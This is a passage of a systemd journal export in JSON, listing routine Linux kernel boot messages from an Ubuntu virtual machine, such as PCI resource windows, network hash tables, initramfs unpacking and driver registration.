0x80000000-0xfebfffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=139;b=e2b08827b5804427b422c10c84f1567e;m=56a4c1;t=5bd16dd1a2428;x=722c89e8012a5aec", "__REALTIME_TIMESTAMP" : "1615280779961384", "__MONOTONIC_TIMESTAMP" : "5678273", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "423097", "MESSAGE" : "pci_bus 0000:00: resource 8 [mem 0x100000000-0x17fffffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13a;b=e2b08827b5804427b422c10c84f1567e;m=56a4d3;t=5bd16dd1a243a;x=114a06ded6048837", "__REALTIME_TIMESTAMP" : "1615280779961402", "__MONOTONIC_TIMESTAMP" : "5678291", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "423173", "MESSAGE" : "NET: Registered protocol family 2" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13b;b=e2b08827b5804427b422c10c84f1567e;m=56a4de;t=5bd16dd1a2446;x=3e6d81c3cbbcd13", "__REALTIME_TIMESTAMP" : "1615280779961414", "__MONOTONIC_TIMESTAMP" : "5678302", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "425901", "MESSAGE" : "TCP established hash table entries: 16384 (order: 5, 131072 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13c;b=e2b08827b5804427b422c10c84f1567e;m=56a4fc;t=5bd16dd1a2463;x=6147d9603b4d9b", "__REALTIME_TIMESTAMP" : "1615280779961443", 
"__MONOTONIC_TIMESTAMP" : "5678332", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "429777", "MESSAGE" : "TCP bind hash table entries: 16384 (order: 6, 262144 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13d;b=e2b08827b5804427b422c10c84f1567e;m=56a516;t=5bd16dd1a247d;x=97f84b1d02a96c2f", "__REALTIME_TIMESTAMP" : "1615280779961469", "__MONOTONIC_TIMESTAMP" : "5678358", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "433287", "MESSAGE" : "TCP: Hash tables configured (established 16384 bind 16384)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13e;b=e2b08827b5804427b422c10c84f1567e;m=56a520;t=5bd16dd1a2487;x=d4e96f4c933619c5", "__REALTIME_TIMESTAMP" : "1615280779961479", "__MONOTONIC_TIMESTAMP" : "5678368", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "436714", "MESSAGE" : "UDP hash table entries: 1024 (order: 3, 32768 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13f;b=e2b08827b5804427b422c10c84f1567e;m=56a52a;t=5bd16dd1a2491;x=41b21a0bbc5a2cab", "__REALTIME_TIMESTAMP" : "1615280779961489", "__MONOTONIC_TIMESTAMP" : "5678378", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "439824", "MESSAGE" : 
"UDP-Lite hash table entries: 1024 (order: 3, 32768 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=140;b=e2b08827b5804427b422c10c84f1567e;m=56a534;t=5bd16dd1a249b;x=73da792df9470e3e", "__REALTIME_TIMESTAMP" : "1615280779961499", "__MONOTONIC_TIMESTAMP" : "5678388", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "443248", "MESSAGE" : "NET: Registered protocol family 1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=141;b=e2b08827b5804427b422c10c84f1567e;m=56a5c7;t=5bd16dd1a252e;x=658e67453d376da9", "__REALTIME_TIMESTAMP" : "1615280779961646", "__MONOTONIC_TIMESTAMP" : "5678535", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:00.0", "_UDEV_SYSNAME" : "0000:00:00.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "445582", "MESSAGE" : "pci 0000:00:00.0: Limiting direct PCI/PCI transfers" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=142;b=e2b08827b5804427b422c10c84f1567e;m=56a65c;t=5bd16dd1a25c3;x=595f41ddd1f2a821", "__REALTIME_TIMESTAMP" : "1615280779961795", "__MONOTONIC_TIMESTAMP" : "5678684", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.0", "_UDEV_SYSNAME" : "0000:00:01.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "448568", "MESSAGE" : "pci 0000:00:01.0: PIIX3: Enabling Passive Release" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=143;b=e2b08827b5804427b422c10c84f1567e;m=56a704;t=5bd16dd1a266c;x=75d157c138f23e2c", "__REALTIME_TIMESTAMP" : "1615280779961964", "__MONOTONIC_TIMESTAMP" : "5678852", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.0", "_UDEV_SYSNAME" : "0000:00:01.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "451465", "MESSAGE" : "pci 0000:00:01.0: Activating ISA DMA hang workarounds" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=144;b=e2b08827b5804427b422c10c84f1567e;m=56a712;t=5bd16dd1a2679;x=3a7b2a2a2ef66c73", "__REALTIME_TIMESTAMP" : "1615280779961977", "__MONOTONIC_TIMESTAMP" : "5678866", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "479755", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKD] enabled at IRQ 11" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=145;b=e2b08827b5804427b422c10c84f1567e;m=56a78b;t=5bd16dd1a26f3;x=31bf186027993c3d", "__REALTIME_TIMESTAMP" : "1615280779962099", "__MONOTONIC_TIMESTAMP" : "5678987", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "507251", "MESSAGE" : "pci 0000:00:02.0: Video device with shadowed ROM at [mem 0x000c0000-0x000dffff]" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=146;b=e2b08827b5804427b422c10c84f1567e;m=56a799;t=5bd16dd1a2700;x=21fcaca2e8065e0f", "__REALTIME_TIMESTAMP" : "1615280779962112", "__MONOTONIC_TIMESTAMP" : "5679001", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "511431", "MESSAGE" : "PCI: CLS 0 bytes, default 64" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=147;b=e2b08827b5804427b422c10c84f1567e;m=56a7a4;t=5bd16dd1a270b;x=e18d87de9a174e67", "__REALTIME_TIMESTAMP" : "1615280779962123", "__MONOTONIC_TIMESTAMP" : "5679012", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "511497", "MESSAGE" : "Unpacking initramfs..." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=148;b=e2b08827b5804427b422c10c84f1567e;m=56a7ae;t=5bd16dd1a2715;x=34e7746456cde406", "__REALTIME_TIMESTAMP" : "1615280779962133", "__MONOTONIC_TIMESTAMP" : "5679022", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "820583", "MESSAGE" : "Freeing initrd memory: 19144K" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=149;b=e2b08827b5804427b422c10c84f1567e;m=56a7d8;t=5bd16dd1a2740;x=5311d723c461c786", "__REALTIME_TIMESTAMP" : "1615280779962176", "__MONOTONIC_TIMESTAMP" : "5679064", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "822860", "MESSAGE" : "clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x1e45270b174, max_idle_ns: 440795290368 ns" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14a;b=e2b08827b5804427b422c10c84f1567e;m=56a7e4;t=5bd16dd1a274c;x=7be0fc3755f665ff", "__REALTIME_TIMESTAMP" : "1615280779962188", "__MONOTONIC_TIMESTAMP" : "5679076", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "827749", "MESSAGE" : "Scanning for low memory corruption every 60 seconds" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14b;b=e2b08827b5804427b422c10c84f1567e;m=56a7ef;t=5bd16dd1a2757;x=3cb141ae816e568", "__REALTIME_TIMESTAMP" : "1615280779962199", "__MONOTONIC_TIMESTAMP" : "5679087", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : 
"5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "831232", "MESSAGE" : "Initialise system trusted keyrings" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14c;b=e2b08827b5804427b422c10c84f1567e;m=56a7ff;t=5bd16dd1a2766;x=95dc4b6c01d1635b", "__REALTIME_TIMESTAMP" : "1615280779962214", "__MONOTONIC_TIMESTAMP" : "5679103", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "833536", "MESSAGE" : "Key type blacklist registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14d;b=e2b08827b5804427b422c10c84f1567e;m=56a80a;t=5bd16dd1a2772;x=f83460486555e757", "__REALTIME_TIMESTAMP" : "1615280779962226", "__MONOTONIC_TIMESTAMP" : "5679114", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "835536", "MESSAGE" : "workingset: timestamp_bits=36 max_order=19 bucket_order=0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14e;b=e2b08827b5804427b422c10c84f1567e;m=56a816;t=5bd16dd1a277d;x=c5140dbfdb532134", "__REALTIME_TIMESTAMP" : "1615280779962237", "__MONOTONIC_TIMESTAMP" : "5679126", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "839847", "MESSAGE" : "zbud: loaded" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14f;b=e2b08827b5804427b422c10c84f1567e;m=56a821;t=5bd16dd1a2788;x=6aa5a866a54b4f6f", 
"__REALTIME_TIMESTAMP" : "1615280779962248", "__MONOTONIC_TIMESTAMP" : "5679137", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "841736", "MESSAGE" : "squashfs: version 4.0 (2009/01/31) Phillip Lougher" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=150;b=e2b08827b5804427b422c10c84f1567e;m=56a82b;t=5bd16dd1a2793;x=3c2d75adcdd0eb95", "__REALTIME_TIMESTAMP" : "1615280779962259", "__MONOTONIC_TIMESTAMP" : "5679147", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "844673", "MESSAGE" : "fuse init (API version 7.26)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=151;b=e2b08827b5804427b422c10c84f1567e;m=56a836;t=5bd16dd1a279e;x=28d57277178b50dc", "__REALTIME_TIMESTAMP" : "1615280779962270", "__MONOTONIC_TIMESTAMP" : "5679158", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "847472", "MESSAGE" : "Key type asymmetric registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=152;b=e2b08827b5804427b422c10c84f1567e;m=56a850;t=5bd16dd1a27b8;x=40d8d771ff08ccfa", "__REALTIME_TIMESTAMP" : "1615280779962296", "__MONOTONIC_TIMESTAMP" : "5679184", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "849648", "MESSAGE" : "Asymmetric key 
parser 'x509' registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=153;b=e2b08827b5804427b422c10c84f1567e;m=56a85b;t=5bd16dd1a27c3;x=317efab2144cd854", "__REALTIME_TIMESTAMP" : "1615280779962307", "__MONOTONIC_TIMESTAMP" : "5679195", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "852179", "MESSAGE" : "Block layer SCSI generic (bsg) driver version 0.4 loaded (major 246)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=154;b=e2b08827b5804427b422c10c84f1567e;m=56a866;t=5bd16dd1a27cd;x=fdb3901705b7c0c9", "__REALTIME_TIMESTAMP" : "1615280779962317", "__MONOTONIC_TIMESTAMP" : "5679206", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "856083", "MESSAGE" : "io scheduler noop registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=155;b=e2b08827b5804427b422c10c84f1567e;m=56a870;t=5bd16dd1a27d8;x=3ae086dee1bc9bf0", "__REALTIME_TIMESTAMP" : "1615280779962328", "__MONOTONIC_TIMESTAMP" : "5679216", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "858210", "MESSAGE" : "io scheduler deadline registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=156;b=e2b08827b5804427b422c10c84f1567e;m=56a87e;t=5bd16dd1a27e6;x=a7bf049c758daa9c", "__REALTIME_TIMESTAMP" : "1615280779962342", "__MONOTONIC_TIMESTAMP" : "5679230", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", 
"SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "860598", "MESSAGE" : "io scheduler cfq registered (default)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=157;b=e2b08827b5804427b422c10c84f1567e;m=56a889;t=5bd16dd1a27f0;x=62b6dd90bf32f5c", "__REALTIME_TIMESTAMP" : "1615280779962352", "__MONOTONIC_TIMESTAMP" : "5679241", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "863243", "MESSAGE" : "intel_idle: Please enable MWAIT in BIOS SETUP" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=158;b=e2b08827b5804427b422c10c84f1567e;m=56a894;t=5bd16dd1a27fb;x=9579224210b193a0", "__REALTIME_TIMESTAMP" : "1615280779962363", "__MONOTONIC_TIMESTAMP" : "5679252", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "863357", "MESSAGE" : "input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=159;b=e2b08827b5804427b422c10c84f1567e;m=56a89e;t=5bd16dd1a2806;x=faabb4a05e54fe68", "__REALTIME_TIMESTAMP" : "1615280779962374", "__MONOTONIC_TIMESTAMP" : "5679262", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "867345", "MESSAGE" : "ACPI: Power Button [PWRF]" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15a;b=e2b08827b5804427b422c10c84f1567e;m=56a8a9;t=5bd16dd1a2810;x=b5d2cab658903538", "__REALTIME_TIMESTAMP" : "1615280779962384", "__MONOTONIC_TIMESTAMP" : "5679273", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "895765", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKC] enabled at IRQ 10" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15b;b=e2b08827b5804427b422c10c84f1567e;m=56a8b3;t=5bd16dd1a281b;x=975e38e9f7891a99", "__REALTIME_TIMESTAMP" : "1615280779962395", "__MONOTONIC_TIMESTAMP" : "5679283", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "953887", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKA] enabled at IRQ 10" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15c;b=e2b08827b5804427b422c10c84f1567e;m=56a8be;t=5bd16dd1a2825;x=76d0dfb4403d0404", "__REALTIME_TIMESTAMP" : "1615280779962405", "__MONOTONIC_TIMESTAMP" : "5679294", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "959258", "MESSAGE" : "Serial: 8250/16550 driver, 32 ports, IRQ sharing enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15d;b=e2b08827b5804427b422c10c84f1567e;m=56a8c8;t=5bd16dd1a2830;x=e3dc566651669442", "__REALTIME_TIMESTAMP" : "1615280779962416", "__MONOTONIC_TIMESTAMP" : "5679304", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : 
"kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "990516", "MESSAGE" : "00:04: ttyS0 at I/O 0x3f8 (irq = 4, base_baud = 115200) is a 16550A" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15e;b=e2b08827b5804427b422c10c84f1567e;m=56a8d3;t=5bd16dd1a283a;x=bafe6839371d59b1", "__REALTIME_TIMESTAMP" : "1615280779962426", "__MONOTONIC_TIMESTAMP" : "5679315", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "995867", "MESSAGE" : "Linux agpgart interface v0.103" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=15f;b=e2b08827b5804427b422c10c84f1567e;m=56a8e1;t=5bd16dd1a2848;x=e1e7dbc7437c01cd", "__REALTIME_TIMESTAMP" : "1615280779962440", "__MONOTONIC_TIMESTAMP" : "5679329", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "999305", "MESSAGE" : "loop: module loaded" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=160;b=e2b08827b5804427b422c10c84f1567e;m=56a981;t=5bd16dd1a28e8;x=5ea5d18ed95c93f8", "__REALTIME_TIMESTAMP" : "1615280779962600", "__MONOTONIC_TIMESTAMP" : "5679489", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : 